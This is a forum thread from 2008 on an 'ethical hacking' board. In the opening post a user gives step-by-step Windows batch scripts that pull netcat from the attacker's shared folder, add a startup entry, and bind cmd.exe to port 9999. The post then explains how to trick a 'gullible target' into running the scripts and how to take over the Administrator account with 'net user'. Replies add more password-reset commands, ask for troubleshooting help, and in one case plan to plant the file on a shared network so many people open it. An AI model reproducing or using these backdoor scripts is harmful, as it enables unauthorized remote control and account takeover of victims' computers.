Hacking a Network Computer

Discussion in 'Ethical hacking Tips' started by SpOonWiZaRd, Oct 8, 2008.

  1. SpOonWiZaRd

    SpOonWiZaRd Know what you can do.

    Joined:
    May 30, 2007
    Messages:
    746
    Likes Received:
    8
    Trophy Points:
    0
    Occupation:
    Network Engineer/Programmer
    Location:
    South Africa
    I wrote this because it really worked for me a few times and I hope it does for you too, all you need is very a gullible target.

    As we all know, a Trojan is very likely to be picked up by AV, what you need is Netcat, netcat opens a port on a computer for access (If used correctly by a batch file you open a port on a target computer). You will need to write a batch file. The batch file to copy netcat on the remote computer will have to be run from the target computer (The person on the target will have to execute the batch file in some way). Open Notepad and type this in:
    Code:
    @echo off
    
    cd\
    xcopy \\yourIP\shared folder\netcat.exe
    copy \\yourIP\shared folder\netcat.exe (just to be sure)
    cd "Documents and Settings"
    cd "All Users"
    cd "Start Menu"
    cd Programs
    cd Startup
    xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
    cd\
    netcat.exe -L -p 9999 -d -e cmd.exe
    
    Save the file as a batch file using Notepad.

    The next batch file will be used to make sure the port you specified opens up every time windows starts up, you can specify any port you wish. Open Notepad and type:
    Code:
    @echo off
    
    cd\
    netcat.exe -L -p 9999 -d -e cmd.exe
    
    Save the file as a batch file using Notepad, this will be the file that is copied into the startup folder in the previous batch file we wrote. You can bind the batch file to another file and share that file, let the target execute that file so that he can copy netcat and the other batch file onto his/hers computer thus opening port 9999, after port 9999 has been opened you can then use telnet and telnet to that port on the target computer to have full access without ever needing any passwords of any sort. After you are in change the Administrator password for if something happens to your files, the command is this:

    net user Administrator newpassword

    Now from here you can do what you want, e.g try shutting down the target computer by browsing to his system32 folder and then type in:

    shutdown -r -t 10 -c "Hello"

    the computer will then restart in 10 seconds time. You can even play around more by Installing Cain & Abel on your computer and then installing Abel remotely on his computer (Since you know the Administrator password) Once you have Abel on the target you can start and stop services and do more!

    Enjoy.
     
  2. hanleyhansen

    hanleyhansen New Member

    Joined:
    Jan 24, 2008
    Messages:
    336
    Likes Received:
    8
    Trophy Points:
    0
    Occupation:
    Drupal Developer/LAMP Developer
    Location:
    Clifton
    Home Page:
    http://www.hanseninfotech.com
    Great article! Is it possible to use Netcat to open a port in a local computer when you have limited rights? I would like to open port 3389 that way I can RDC.
     
  3. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    561
    Likes Received:
    19
    Trophy Points:
    0
    well if the users password isnt administrator type this

    Net user

    it will display a list of user accounts

    once found type in this

    net user username newpassword so for example

    net user blahh 123456

    his new password is 123456

    and whola :)

    nice artcile by the way
     
  4. arun_yadav96

    arun_yadav96 New Member

    Joined:
    Oct 16, 2008
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    0
  5. sundeep.kumar

    sundeep.kumar New Member

    Joined:
    Dec 20, 2007
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    0
    Occupation:
    Was MIS person once now just a student.
    what to do if we get error mesage "Access is Denied" - further it says somewhere around 5 errors occured .....
     
  6. me.unknowwn

    me.unknowwn New Member

    Joined:
    Nov 6, 2008
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    0
    I read somewhere that the IP address is being changed regularly by the ISP. I too keep on checking my IP address on regular intervals and found this information to be true although the the part of the IP address remains unchanged.

    Here in this case, how one can be sure that writing own's IP address in batch file will always point to our computer ?

    What i noticed is at around 5pm I connected to net with IP Address (AAA.BBB.CC.DDD)

    I diconnected the net and reconnected immediately and the IP address was now (AAA.BBB.XX.YYY)

    Please clarify my point. Does this change in IP made by the ISP each time we log in on the net matters or not in determining our own or target machine's IP address?

    (Please don't mind. I am still in learning phase.)
     
  7. NDL

    NDL New Member

    Joined:
    Oct 20, 2008
    Messages:
    71
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    SL,colombo
    Home Page:
    http://www.nisal.co.nr
    this only work if we are in a admin account only!!!
     
  8. NDL

    NDL New Member

    Joined:
    Oct 20, 2008
    Messages:
    71
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    SL,colombo
    Home Page:
    http://www.nisal.co.nr
    bcz u must be trying to access through a limit account :D
     
  9. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
  10. Bhullarz

    Bhullarz New Member

    Joined:
    Nov 15, 2006
    Messages:
    253
    Likes Received:
    13
    Trophy Points:
    0
    Occupation:
    System Manager
    Home Page:
    http://www.tutors161.com
    If we are trying to open a port and through that we trying to access the machine using TELNET or any other program, even Windows XP's in-built firewall alerts the user to keep the port blocked or unblocked whether you are using ADMIN account or not. Then no fun of executing the batch at the remote location.

    Moreover, when I tried to run the command "netcat" , it didn't worked as msg was it is not internet / external comand.I am using Windows XP Service Pack 3.
     
    Last edited: Nov 17, 2008
  11. zaanrider

    zaanrider New Member

    Joined:
    Nov 19, 2007
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    Nice...Thanks
     
  12. brajrajsingh

    brajrajsingh New Member

    Joined:
    Jan 18, 2008
    Messages:
    8
    Likes Received:
    0
    Trophy Points:
    0
    Netcat is neither available in WinXP-SP2 nor in SP3
     
  13. happyz

    happyz New Member

    Joined:
    Nov 18, 2008
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    0
    Agree with Bhullarz .... i also tried it same reply was their as it is not internal/external command. I am using Windows Xp SP2
     
  14. marshtric

    marshtric New Member

    Joined:
    Nov 29, 2008
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    Hackers and spammers use all the latest software security holes, worms and trojans to attack many businesses and trick Internet users into revealing their personal and financial information. These constant attacks on private and public systems have become more than just a nuisance, they’ve become an overwhelming financial burden, 10 billion dollars. Listed below are the most commonly used programs Hacker tools, Key Loggers, RAT: (Remote Administration Tool), Spyware, Spyware cookies, Trojans, and Worms from the year 2003.
     
  15. pop3_zxcv

    pop3_zxcv New Member

    Joined:
    Nov 29, 2008
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    0
    Netcat is well known as a swiss army knife tool. Its a small exe works in windows as well as in all flavor of Linux. Netcat is normally used in a hacking as a backdoor becuse of its small size and you will find in Metaexpoits framework using netcat using as a backdoor.

    Netacat wont work if the pc has anti-virus(AV) installed on it. Normally all AV detect netcat as a backdoor and delete it.

    Hobbit (hobbit@avian.org) created netcat in 1995 as a feature-rich network debugging
    and exploration tool. Its purpose was to be able to create just about any type of network
    connection. According to Hobbit2-
    Some of the features of netcat are:
    · Outbound or inbound connections, TCP or UDP, to or from any ports
    · Full DNS forward/reverse checking, with appropriate warnings
    · Ability to use any local source port
    · Ability to use any locally-configured network source address
    · Built-in port-scanning capabilities, with randomizer
    · Built-in loose source-routing capability
    · Can read command line arguments from standard input
    · Slow-send mode, one line every N seconds
    · Optional ability to let another program service inbound connections

    Some of the potential uses of netcat:
    · Script backends
    · Scanning ports and inventorying services
    · Backup handlers
    · File transfers
    · Server testing and simulation
    · Firewall testing
    · Proxy gatewaying
    · Network performance testing
    · Address spoofing tests
     
  16. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
  17. arvindsony

    arvindsony New Member

    Joined:
    Nov 30, 2008
    Messages:
    7
    Likes Received:
    0
    Trophy Points:
    0
  18. silenthill

    silenthill New Member

    Joined:
    Dec 4, 2008
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    0
    please the details! i cannot understandt because i am newbie. and how to hacking web admin for username and password please the details!
     
  19. pleomax02

    pleomax02 New Member

    Joined:
    Mar 4, 2009
    Messages:
    4
    Likes Received:
    2
    Trophy Points:
    0
    Hi,
    I am on a network and i can see at least 30 people on My Network Places. But when i click on any of those PC's i get an error message.

    Can you kindly describe:
    1. How should i enable file sharing and share a folder without giving away my computer? Don't worr y over here the punishment for getting caught is negligible.

    2.How should i make a batch file so that when i put it in that shared folder it will work like you mentioned above. I cannot exactly copy because my IP always changes whenever i disable and enable my LAN card.

    3.I am not on a wireless network. My ISP provides its service through a fibre optic which connects to a ethernet switch and from that switch i am gettting my connection using a CAT5 cable. there are probably 20 more lines on that ethernet switch.

    4.When i run 'control userpasswords2' i get Administrators beside my User name.

    It will be helpful if you help me out with this because some one in my network did some serious damage to my PC and i had to re-format my PC to get everything back to normal. I know who that person is but i am not a programmer nor a hacker and that is why i am asking your help.

    5. I am pretty sure if you help me create the batch file and if i put it in the shared folder a lot of people will click on it. So please help me.
     
  20. LukaB

    LukaB New Member

    Joined:
    Mar 4, 2009
    Messages:
    51
    Likes Received:
    0
    Trophy Points:
    0
    This is so great, I will share this with my friends.
     

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice